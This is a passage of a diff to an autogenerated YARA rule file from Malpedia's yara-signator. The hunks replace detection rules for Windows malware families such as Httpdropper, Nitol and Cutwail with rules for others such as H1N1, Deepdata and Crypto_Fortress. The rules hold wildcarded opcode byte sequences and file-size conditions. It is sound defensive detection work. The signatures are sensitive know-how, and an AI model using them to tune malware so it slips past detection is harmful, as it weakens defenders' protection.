-		$sequence_4 = { 52 50 ff91d0000000 8d45e4 50 ff15???????? ebd3 }
-		$sequence_5 = { 66a3???????? 8be5 5d c3 6a14 68???????? e8???????? }
-		$sequence_6 = { 84d2 7407 838b0c02000020 807dff00 7407 }
-		$sequence_7 = { ff75e4 ff7604 ff36 ff7508 e8???????? }
-		$sequence_8 = { 8b45fc ebd0 53 55 33db 33ed }
-		$sequence_9 = { ff75e4 ff15???????? 85c0 7425 6a0b 56 ff75d8 }
+		$sequence_0 = { 3bce 7602 8bce 85c9 7415 8b7d08 8b720c }
+		$sequence_1 = { 394df4 72cd 8b703c 03f0 8b8e80000000 837c010c00 7449 }
+		$sequence_2 = { ff55f0 8b7508 8b9e40110000 81c604110000 6a40 6800300000 03de }
+		$sequence_3 = { 55 8bec 83ec68 6a6b 58 6a65 66894598 }
+		$sequence_4 = { 6a6b 58 6a65 66894598 58 }
+		$sequence_5 = { 51 ff15???????? 8945f8 8d45f8 50 ff15???????? 33d2 }
+		$sequence_6 = { 8b0c87 0fb70443 8b3486 8365fc00 03ca 894df4 }
+		$sequence_7 = { 58 6a72 6689459a 58 6a6e 6689459c 58 }
+		$sequence_8 = { 47 83ff0c 72ea 83ff0c }
+		$sequence_9 = { 8b5df4 03d8 8a4405d0 3a441dd0 }
 
 	condition:
-		7 of them and filesize < 466944
+		7 of them and filesize < 115712
 }
-rule MALPEDIA_Win_Httpdropper_Auto : FILE
+rule MALPEDIA_Win_H1N1_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "18260766-6bdf-5211-bbc4-97447962c71b"
+		id = "37ad4a5e-e020-5ff8-9301-408e3e0a9d4d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.httpdropper_auto.yar#L1-L186"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.h1n1"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.h1n1_auto.yar#L1-L176"
 		license_url = "N/A"
-		logic_hash = "22451066791784b19aa73ef3663c2f2d2a5d036611d6a095731732bebf19aeab"
+		logic_hash = "2e33215c731e3a160279240713f0099872fd50afe0eb8ebfd851884e2b2c7ed5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -142696,40 +142516,40 @@ rule MALPEDIA_Win_Httpdropper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bd8 8985d0f0ffff 85db 0f8482000000 6a3c 8d8554f0ffff 6a00 }
-		$sequence_1 = { 3dff000000 0f87c3020000 f685a8f7ffff10 0f844f010000 8b751c 3bf3 0f8444010000 }
-		$sequence_2 = { 83c40c 6803010000 8d8c2444030000 51 c744241400000000 ff15???????? 8b3d???????? }
-		$sequence_3 = { 75f9 2bc1 7511 33c0 5e 8b4dfc 33cd }
-		$sequence_4 = { b9???????? 8bf0 e8???????? 50 8d9435f4feffff 68???????? 52 }
-		$sequence_5 = { 8d8d64f2ffff e8???????? 687f0c0000 8d856df2ffff }
-		$sequence_6 = { 50 8d95f8feffff 52 e8???????? 83c408 85c0 }
-		$sequence_7 = { 8bc6 c1f805 8d0c8560aa0310 8bc6 83e01f c1e006 8b11 }
-		$sequence_8 = { 41b800040000 c684246002000000 e8???????? 488d8c2470060000 4c8bcf ba01000000 41b800040000 }
-		$sequence_9 = { 48894c2450 498bf0 0fb6fa 488d8da1000000 33d2 41b80b030000 }
-		$sequence_10 = { 48c7c102000080 4889442420 ff15???????? 85c0 0f8513010000 488d0d761d0200 c744244004000000 }
-		$sequence_11 = { 488985400f0000 4c8bb5c00f0000 48894c2450 4d8be0 4c89442448 488bf2 488d8d31060000 }
-		$sequence_12 = { 41f7e8 c1fa05 4c8d0520440200 8bc2 c1e81f 03d0 }
-		$sequence_13 = { 488bd0 ff15???????? 488d0d6b080200 488905???????? e8???????? 488bcb }
-		$sequence_14 = { 53 55 56 4154 4155 4883ec50 448bca }
-		$sequence_15 = { 450fb6c0 4489542430 89542428 894c2420 488d1599d50100 488d8c2490000000 }
+		$sequence_0 = { bb09000000 eb6c 83bde8feffff0a 7563 }
+		$sequence_1 = { 51 8b7df4 b900100000 33c0 f3aa 59 }
+		$sequence_2 = { c745cc01000000 c745d010000000 c745d402000000 c745d820000000 c745dc04000000 c745e040000000 }
+		$sequence_3 = { ff05???????? 6800020000 ff35???????? 58 }
+		$sequence_4 = { 3503003400 ab 2d0e00fcff ab }
+		$sequence_5 = { ffd0 ff750c ff75f0 ff75f4 8d45b8 50 e8???????? }
+		$sequence_6 = { c745e404000000 c745e840000000 0fb77b06 8db3f8000000 33c9 f7462400000020 7403 }
+		$sequence_7 = { ff75f8 ff7508 ff75fc ff75f4 ff35???????? 58 ffd0 }
+		$sequence_8 = { 25ff000000 c1e908 330c85908f0010 42 }
+		$sequence_9 = { 8bc1 83e001 d1e9 330c8500850010 330c95f48b0010 42 890c95bc850010 }
+		$sequence_10 = { 8b442404 33d2 a3???????? 42 b9c0850010 8b01 c1e81e }
+		$sequence_11 = { 50 68fc600010 6804010000 ff7508 e8???????? 83c424 c9 }
+		$sequence_12 = { 81ff7c8f0010 7cd4 5f 8b0d???????? 330d???????? }
+		$sequence_13 = { d1e9 330c8500850010 330d???????? 890d???????? 8b0cb5c0850010 8bc1 c1e80b }
+		$sequence_14 = { 33f6 53 8bd6 bbffffff7f 8b0c95c4850010 330c95c0850010 23cb }
+		$sequence_15 = { 68f4600010 56 e8???????? 8bf0 59 }
 
 	condition:
-		7 of them and filesize < 524288
+		7 of them and filesize < 172032
 }
-rule MALPEDIA_Win_Cuegoe_Auto : FILE
+rule MALPEDIA_Win_Deepdata_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1c8a706e-da68-55ba-a4ca-eaa50b244652"
+		id = "8aad3a67-fb15-5e5f-9d9e-ff6fff6a45f8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cuegoe_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deepdata"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.deepdata_auto.yar#L1-L338"
 		license_url = "N/A"
-		logic_hash = "f45425f55dbbdbdba945f538455e47f9972b3b43f177d31d74ee7524c51ab351"
+		logic_hash = "a34d5234f4db9f94f6aa56b11d8ba8d09bbd4a4349792470c342c748e8726f18"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -142741,32 +142561,58 @@ rule MALPEDIA_Win_Cuegoe_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8985500c0000 8b432c 8b4b24 57 }
-		$sequence_1 = { 57 8db55c030000 e8???????? 53 57 8db59c030000 e8???????? }
-		$sequence_2 = { 8bff 8b4500 83780400 0f84961a0000 8b30 0fb636 8b551c }
-		$sequence_3 = { 894740 8b454c 894744 8b4550 894748 8b4554 89474c }
-		$sequence_4 = { 0f8554020000 57 83ec18 8bc4 89654c 53 50 }
-		$sequence_5 = { 8b149580cf0310 c1e006 8d440224 802080 884dfd 8065fd48 884dff }
-		$sequence_6 = { 894310 5e 5f c20400 6a04 }
-		$sequence_7 = { b8???????? e8???????? 8b7508 8365f000 c706???????? c746581c520310 }
-		$sequence_8 = { ff5004 0fb7c0 6a01 50 ff7528 8d758c ff7524 }
-		$sequence_9 = { 897dc4 50 c745fc02000000 e8???????? 33c0 c745c401000000 c745ec07000000 }
+		$sequence_0 = { 751d 68???????? ff15???????? 50 }
+		$sequence_1 = { 83d000 50 51 8bce e8???????? }
+		$sequence_2 = { b001 5d c3 8ac1 }
+		$sequence_3 = { 8bd0 8bce e8???????? 83c408 5f }
+		$sequence_4 = { 837d0800 7502 eb10 8b4508 a3???????? }
+		$sequence_5 = { 55 8bec 8b4508 32c9 85c0 }
+		$sequence_6 = { 740a 50 ff15???????? 83c404 8b8c245c010000 }
+		$sequence_7 = { 8bec 56 57 8bf9 8d7704 8bce c707???????? }
+		$sequence_8 = { e8???????? 81e3fbff0000 f20f1106 83cb08 }
+		$sequence_9 = { ff36 e8???????? 83c408 c707???????? f6450801 }
+		$sequence_10 = { 8bec 56 8bf1 c706???????? 8b4e18 83f910 7228 }
+		$sequence_11 = { 83c104 3bd3 7cf2 eb06 32c0 88442425 }
+		$sequence_12 = { e8???????? 83c40c c785c4fbffff2c020000 6a00 }
+		$sequence_13 = { 7760 8bc2 51 50 e8???????? 83c408 c7463000000000 }
+		$sequence_14 = { 64a300000000 8bf1 8b7d08 897dd0 c745d800000000 c745e800000000 c745ec0f000000 }
+		$sequence_15 = { c78560ffffff00000000 c78564ffffff00000000 c78568ffffff00000000 c7856cffffff00000000 c78550ffffff00000000 c7458800000000 }
+		$sequence_16 = { 837df401 7543 68???????? ff15???????? }
+		$sequence_17 = { 8b4dfc e8???????? 8b4dfc e8???????? 8b10 52 8b4dfc }
+		$sequence_18 = { 83c40c 83c118 6a08 50 }
+		$sequence_19 = { e8???????? 8b00 50 8b4dfc e8???????? 8bc8 }
+		$sequence_20 = { e8???????? 8b00 50 e8???????? 83c404 2bf0 }
+		$sequence_21 = { a1???????? 8b4858 ffd1 83c40c }
+		$sequence_22 = { 83c428 c645fc00 8d4d08 e8???????? c745fcffffffff 8d4d14 e8???????? }
+		$sequence_23 = { e8???????? 83c404 394508 7321 8b4dfc }
+		$sequence_24 = { 83c40c b001 5f 5b }
+		$sequence_25 = { 8bec 83ec08 894dfc 8b4dfc e8???????? 8b00 50 }
+		$sequence_26 = { 837df800 7549 837df401 7543 }
+		$sequence_27 = { 6a00 6a00 ff7514 ff75c8 ff75c0 ff75c4 }
+		$sequence_28 = { 8b4dfc e8???????? 8b16 3b10 750a 6a01 }
+		$sequence_29 = { 8945e4 8b4dec e8???????? 833800 }
+		$sequence_30 = { 50 8b4d10 8b11 ffd2 83c404 }
+		$sequence_31 = { 8b4dfc 8b5108 0fb602 50 8b4dfc e8???????? }
+		$sequence_32 = { 85d2 7526 8d4d90 e8???????? 0fb6c0 85c0 }
+		$sequence_33 = { 83c118 e8???????? 8945f8 837df804 7408 837df808 740c }
+		$sequence_34 = { 83c00c 6a00 50 e8???????? 84c0 }
+		$sequence_35 = { 8b4dfc 8b5008 3b5104 7505 83c8ff eb1e 8b45fc }
 
 	condition:
-		7 of them and filesize < 540672
+		7 of them and filesize < 33134592
 }
-rule MALPEDIA_Win_Dexter_Auto : FILE
+rule MALPEDIA_Win_Zardoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b1377870-3c18-50e1-8895-9f4c52e3708d"
+		id = "50308ee9-1428-5d6c-b40d-321fe9c765a2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dexter_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zardoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zardoor_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "a43855bc8fa5d1635b94e65a3069c65413410fe093cfd7f70d80f09412658791"
+		logic_hash = "491b0a08b4b203499d0503a262d51ee8a6400f1ce6bac152bdcd0f18d092424e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -142780,32 +142626,32 @@ rule MALPEDIA_Win_Dexter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a59 ff15???????? 85c0 7414 68???????? 8b4d08 }
-		$sequence_1 = { 50 6a00 ff15???????? 68???????? 68???????? }
-		$sequence_2 = { 8b0d???????? 51 ff15???????? 8b15???????? 8955fc 8b45fc 50 }
-		$sequence_3 = { 8b45fc 50 ff15???????? 8b0d???????? 51 ff15???????? ebc6 }
-		$sequence_4 = { 83c40c 68???????? ff15???????? 6a00 6a00 6a00 6a00 }
-		$sequence_5 = { e9???????? 6a59 ff15???????? 85c0 7514 68???????? 8b4d08 }
-		$sequence_6 = { e8???????? 83c410 8b4508 50 8b4d10 }
-		$sequence_7 = { ff15???????? 6a4a 6a00 68???????? e8???????? 83c40c 6a4a }
-		$sequence_8 = { 7514 68???????? 8b5508 52 ff15???????? e9???????? }
-		$sequence_9 = { 51 6a08 8b15???????? 52 ff15???????? 8945f8 }
+		$sequence_0 = { 740d c7442428ac070000 e9???????? f687d005000080 8b442468 410f44c1 81fa03030000 }
+		$sequence_1 = { f6c210 752c eb0a f6c220 7405 4584c0 7920 }
+		$sequence_2 = { e8???????? 4889442448 4885c0 0f85c9000000 c74424201d010000 4c8d0d264f0b00 8d5566 }
+		$sequence_3 = { ffc3 895c2430 e8???????? 3bd8 0f8c2cfeffff b801000000 488b9c2488000000 }
+		$sequence_4 = { 488d1572b10900 488bcd e8???????? 85c0 0f8e29020000 488b13 4885d2 }
+		$sequence_5 = { e8???????? 4883c9ff 660f1f440000 48ffc1 803c0800 75f7 83c10d }
+		$sequence_6 = { e8???????? 488906 4885c0 0f85ab000000 83c8ff 488b742458 488b5c2460 }
+		$sequence_7 = { e8???????? 4885c0 8bde 0f95c3 e8???????? 85db 488b9c2440010000 }
+		$sequence_8 = { 8bc3 448bcb 488bf9 448bc3 488bcb 4883f838 7317 }
+		$sequence_9 = { e8???????? 85c0 0f84d1000000 4d8b8d90000000 488bd3 4c8b442440 488bcb }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 4376576
 }
-rule MALPEDIA_Win_Nitol_Auto : FILE
+rule MALPEDIA_Win_Crypto_Fortress_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6668ada1-f01c-572c-b281-f0ac4f640b75"
+		id = "57f6010b-f9b8-526f-94e4-905e1c039cff"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nitol_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.crypto_fortress_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "67d30b435253ce01a4470efa2d653d5ffbe45043e37cc62d200042e270ffc2b7"
+		logic_hash = "260674d34cb12cfd5de2f1a83904a3f49c27965fc58fd434a5b27b625cba2777"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -142819,19 +142665,19 @@ rule MALPEDIA_Win_Nitol_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8554ffffff 50 e8???????? 83c420 bffa000000 }
-		$sequence_1 = { 8945e4 51 ff75ec 50 ff7508 ff15???????? }
-		$sequence_2 = { 57 ffd3 45 3bae08010000 7cd6 57 }
-		$sequence_3 = { 896c2434 8d442434 6a04 bd05100000 50 55 }
-		$sequence_4 = { 55 8bec 81ec20020000 c645e0cf c645e185 c645e2cc c645e3c4 }
-		$sequence_5 = { 5b 55 8bec 81ec18050000 56 }
-		$sequence_6 = { 50 e8???????? 83c424 8d8560ffffff 66c745f00200 50 ff15???????? }
-		$sequence_7 = { ff15???????? 85c0 7d16 ff742404 }
-		$sequence_8 = { ffd6 ffb530ffffff 668945d8 ffd6 6800e9a435 }
-		$sequence_9 = { 8a0c3b 880e 46 43 ebf3 43 40 }
+		$sequence_0 = { 045a aa 2cff aa 2cf9 }
+		$sequence_1 = { 0433 aa 04fc aa 3411 }
+		$sequence_2 = { aa 345e aa 04af aa 2cfb aa }
+		$sequence_3 = { aa 040f aa 2c0f }
+		$sequence_4 = { aa 341b aa 2c01 }
+		$sequence_5 = { 894304 83c308 8345fc08 c78548ffffff9c000000 }
+		$sequence_6 = { 2c00 aa 0411 aa 2c51 aa 3421 }
+		$sequence_7 = { 2cee aa 2c01 aa 04f1 }
+		$sequence_8 = { 85c0 0f84d0000000 68???????? 8d85eafeffff 50 }
+		$sequence_9 = { 8bec 83c4f8 53 ff35???????? e8???????? 6bc004 }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 188416
 }
 rule MALPEDIA_Win_Gazer_Auto : FILE
 {
@@ -142872,18 +142718,18 @@ rule MALPEDIA_Win_Gazer_Auto : FILE
 	condition:
 		7 of them and filesize < 950272
 }
-rule MALPEDIA_Win_Murkytop_Auto : FILE
+rule MALPEDIA_Win_Kamasers_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "09dd87b2-848c-59f6-89b2-09fd740bcdeb"
+		id = "c1a7cc0c-2e35-5239-9e79-174b829766cd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.murkytop_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kamasers"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kamasers_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "d0c9a9dcefc5b4fab8d861110dfc72a07f2978208e468d91616835a5f37c61c4"
+		logic_hash = "bc9204b6b1cca7a86ddf29783e99c6413f2a7179ee494a096a7a149c0e384519"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -142897,32 +142743,32 @@ rule MALPEDIA_Win_Murkytop_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bc6 c1f805 57 83e61f 8d3c85e0f54100 8b07 }
-		$sequence_1 = { 0f8827040000 8b5d08 8d7dec e8???????? 85c0 0f8814040000 6803010000 }
-		$sequence_2 = { 50 68???????? e8???????? 8b45fc 8b4868 51 }
-		$sequence_3 = { 8b4de8 51 68???????? e8???????? 8b55f0 }
-		$sequence_4 = { 3bc6 7377 8bce e8???????? c745fc00000000 }
-		$sequence_5 = { 50 68???????? e8???????? 8b45fc 8b4824 51 e8???????? }
-		$sequence_6 = { 7551 8b4d08 85c9 745e 8b7918 b889888888 f7ef }
-		$sequence_7 = { 3bc7 7629 8bcf 8bd1 d1ea beffffff3f 2bf2 }
-		$sequence_8 = { b902000000 66894dc4 53 ff15???????? 668945c6 }
-		$sequence_9 = { 3c69 7404 3c49 757f c645fa01 e9???????? c645fe01 }
+		$sequence_0 = { 83c414 ebe1 8b55ec 8b4de8 8b04957885f904 807c082800 7d55 }
+		$sequence_1 = { 7602 8b06 8a4c3a04 80f13f 884c1004 83c205 83fa19 }
+		$sequence_2 = { 7776 51 52 e8???????? 83c408 c745e400000000 c745e80f000000 }
+		$sequence_3 = { 33c0 0f57c0 c78558feffff02000000 0f118548feffff 66898548feffff ba0f000000 88854afeffff }
+		$sequence_4 = { ffb5b4dbffff 8d85f0efffff f7d1 50 ffb5f8dbffff 66898dfaefffff ff95b0dbffff }
+		$sequence_5 = { 8b85e8fdffff 83f80f 7634 8b95d4fdffff 8d4801 8bc2 81f900100000 }
+		$sequence_6 = { 0f85be000000 8d4dd4 e8???????? 50 8d4d98 e8???????? 8b4de8 }
+		$sequence_7 = { 6a01 68???????? 8d8d40edffff c645fc13 e8???????? c785fcd8ffff00000000 }
+		$sequence_8 = { 0f875c070000 51 52 e8???????? 83c408 837de80f }
+		$sequence_9 = { 8bc8 2bcf b8abaaaa2a f7e9 8b4b04 c1fa02 2bcf }
 
 	condition:
-		7 of them and filesize < 294912
+		7 of them and filesize < 906240
 }
-rule MALPEDIA_Win_Powerpool_Auto : FILE
+rule MALPEDIA_Win_Virtualgate_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d4f7d376-91ac-5fba-b394-2196d4883657"
+		id = "9ec48095-319c-5914-b4c7-b90192caa4ab"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.powerpool_auto.yar#L1-L156"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virtualgate"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.virtualgate_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "dfb0ae2ebf3333eb0ea72de9c6611cca01721c6596963f45a9f1a6121b1e8024"
+		logic_hash = "bdfea9aeb2fcf2d699fffd47ea03945e66306ca4f124485dd66c43c3284358f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -142936,38 +142782,32 @@ rule MALPEDIA_Win_Powerpool_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7412 8b04b0 50 e8???????? }
-		$sequence_1 = { 7412 837de810 8b45d4 895de4 }
-		$sequence_2 = { 895e64 33db 894e68 53 53 56 }
-		$sequence_3 = { 7412 8b4904 80e103 80f901 }
-		$sequence_4 = { 006711 40 0000 0303 }
-		$sequence_5 = { 7412 6a00 e8???????? 84c0 7407 b802000000 5f }
-		$sequence_6 = { 7412 83e903 0f8515010000 c745dcfcae4400 }
-		$sequence_7 = { 895e64 ff15???????? 8b4c2418 51 }
-		$sequence_8 = { 7412 8b45d0 2403 3c01 }
-		$sequence_9 = { 895e64 e9???????? 53 57 }
-		$sequence_10 = { 8b6c2468 55 6a02 33db 33ff ff15???????? 8bf0 }
-		$sequence_11 = { 7443 8b45d4 83ff10 7303 }
-		$sequence_12 = { 005311 40 005d11 40 006711 }
-		$sequence_13 = { 8965f0 85c9 7504 33ff eb16 }
-		$sequence_14 = { 895e64 ff15???????? 8b442414 50 }
-		$sequence_15 = { 7412 8b45a4 83c01f 3945b0 }
+		$sequence_0 = { 418bc4 0f47c1 89442438 ffc8 8bf8 0fb68c82029a0100 }
+		$sequence_1 = { 66250100 7225 0100 7e25 0100 8a25???????? }
+		$sequence_2 = { 48894604 b906000000 48898620020000 0fb7c0 66f3ab 488d3d18470100 482bfe }
+		$sequence_3 = { 85c0 0f8483000000 488d8510030000 49c7c0ffffffff 49ffc0 42383400 }
+		$sequence_4 = { 488d15263d0100 e8???????? 8bcb 4885c0 740c }
+		$sequence_5 = { 488d0d30ecfeff 4c8945e7 4d03e8 48895df7 4c8be3 4c896db7 }
+		$sequence_6 = { 85c0 0f8403010000 488d0566080100 4a8b04e8 42385cf838 0f8ded000000 }
+		$sequence_7 = { 48895c2408 57 4883ec20 488d1d8fc60100 488d3d88c60100 }
+		$sequence_8 = { f30f6f0f 4883f80e 7773 8b848634270100 4803c6 }
+		$sequence_9 = { 4b8b8ce0f0250200 4803ca 48ffc2 468854f13e }
 
 	condition:
-		7 of them and filesize < 819200
+		7 of them and filesize < 323584
 }
-rule MALPEDIA_Win_Gcleaner_Auto : FILE
+rule MALPEDIA_Win_Cutwail_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "db79045a-62be-5422-a484-4f1494402bb2"
+		id = "cbc2bf28-da14-5ea8-8af9-9a0a97c6e135"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gcleaner_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cutwail_auto.yar#L1-L159"
 		license_url = "N/A"
-		logic_hash = "87e8c0680ea583ebecdec70190c315f1a40f9206262d6c132334f2c61dd046c1"
+		logic_hash = "9ba6db86559b6188867d3264363e179bc81f3f3f5481bc0c2638242b1cc71cd8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -142981,32 +142821,38 @@ rule MALPEDIA_Win_Gcleaner_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 6a04 8d85f0feffff 50 56 ff15???????? 85c0 }
-		$sequence_1 = { 5e c9 c3 53 ff7518 }
-		$sequence_2 = { 8035????????2e 8035????????2e 8035????????2e 8035????????2e 8035????????2e }
-		$sequence_3 = { 8bf8 83c40c 83ffff 743b 3bf7 }
-		$sequence_4 = { 57 8bd0 c645fc03 8d4dc0 }
-		$sequence_5 = { 7505 c60600 ebe9 837d1000 7518 }
-		$sequence_6 = { 8bd0 c645fc02 8d4da8 e8???????? 57 8bd0 }
-		$sequence_7 = { 8bd0 c645fc04 8d4dd8 e8???????? 83c410 8d4dc0 }
-		$sequence_8 = { 50 660fd685f8feffff e8???????? 83c40c 56 }
-		$sequence_9 = { ebe9 837d1000 7518 c60600 e8???????? }
+		$sequence_0 = { 0f849d000000 ff7510 e8???????? 59 }
+		$sequence_1 = { eb14 8b55fc 0355f8 8955fc }
+		$sequence_2 = { 59 7506 891d???????? 53 57 }
+		$sequence_3 = { 833800 7511 837df800 7e0b }
+		$sequence_4 = { 6a66 8d8d90f1ffff e8???????? 03c3 }
+		$sequence_5 = { 57 ff755c 03c8 51 e8???????? }
+		$sequence_6 = { 895104 8b8550feffff c7400800c02004 6a00 6a00 }
+		$sequence_7 = { e8???????? 894604 8b4610 57 }
+		$sequence_8 = { 8bec 81ecc4010000 8d8570feffff 50 6802020000 e8???????? 85c0 }
+		$sequence_9 = { 51 e8???????? 83c410 8985ecfdffff }
+		$sequence_10 = { 1bc0 f7d0 234554 e9???????? }
+		$sequence_11 = { 6bc912 56 ff742428 8981feb71513 }
+		$sequence_12 = { 8b95e4fdffff 52 8d85f8fdffff 50 e8???????? 83c408 }
+		$sequence_13 = { 53 53 6a02 e8???????? 894558 }
+		$sequence_14 = { c7854cfeffff00000000 eb0f 8b954cfeffff 83c201 89954cfeffff 83bd4cfeffff03 0f8db5000000 }
+		$sequence_15 = { 0f8d23010000 6800020000 6a00 8d95f8fdffff 52 }
 
 	condition:
-		7 of them and filesize < 540672
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Doublefinger_Auto : FILE
+rule MALPEDIA_Win_Lightrail_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1a4bb31a-3c01-5b6e-ae26-bb31027c979c"
+		id = "58541781-79c6-574d-b195-c74fbba8085e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefinger"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.doublefinger_auto.yar#L1-L113"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightrail"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lightrail_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "34310946832cc40b49a31828e604fb9d9a1c8fad12732184c4ffa2b4443b2159"
+		logic_hash = "5d9e17bc35bca0e64cb85c52ac794612dc1d7650f37d7c51842cacd140fd6d54"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -143020,32 +142866,32 @@ rule MALPEDIA_Win_Doublefinger_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c644247d64 c644247e79 c644247f97 488d942410030000 488d4c2478 e8???????? }
-		$sequence_1 = { 8b442448 39442444 7d27 41b87a000000 ba61000000 488b8c2468010000 e8???????? }
-		$sequence_2 = { 4533c0 8b942464010000 488b4c2450 e8???????? }
-		$sequence_3 = { c6440478af ba0a020000 b940000000 488b842468010000 ff5038 }
-		$sequence_4 = { e8???????? ba0a020000 488d8c2460010000 e8???????? }
-		$sequence_5 = { 39442408 0f8394000000 c6042400 c744240400000000 eb0a 8b442404 }
-		$sequence_6 = { 488bc1 eb7a 837c242000 7471 }
-		$sequence_7 = { ba0a020000 b940000000 488b442470 ff5038 }
-		$sequence_8 = { 3565708005 8984246c010000 8b84246c010000 8b4c2460 33c8 }
-		$sequence_9 = { 66898424fc000000 33c0 66898424fe000000 ba64000000 }
+		$sequence_0 = { b931ad0231 e8???????? 48894330 4885c0 0f8486000000 }
